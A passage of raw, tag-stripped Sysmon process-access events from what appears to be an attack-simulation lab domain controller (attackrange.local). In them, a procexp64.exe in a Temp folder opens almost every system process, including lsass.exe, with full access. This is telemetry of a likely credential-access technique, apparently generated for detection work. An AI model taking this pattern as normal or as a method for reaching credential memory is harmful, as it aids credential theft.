Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787108Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787107Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787106Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787105Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787104Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787103Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787102Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787101Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787100Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787099Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787098Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787097Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787096Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787095Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787094Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787093Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787092Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787091Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787090Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787089Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787088Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787087Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787086Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787085Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787084Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787083Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787082Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787081Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787080Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787079Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787078Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787077Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787076Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787075Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787074Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787073Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.658{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787072Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C5A2-00000000A301}5220C:\Windows\System32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\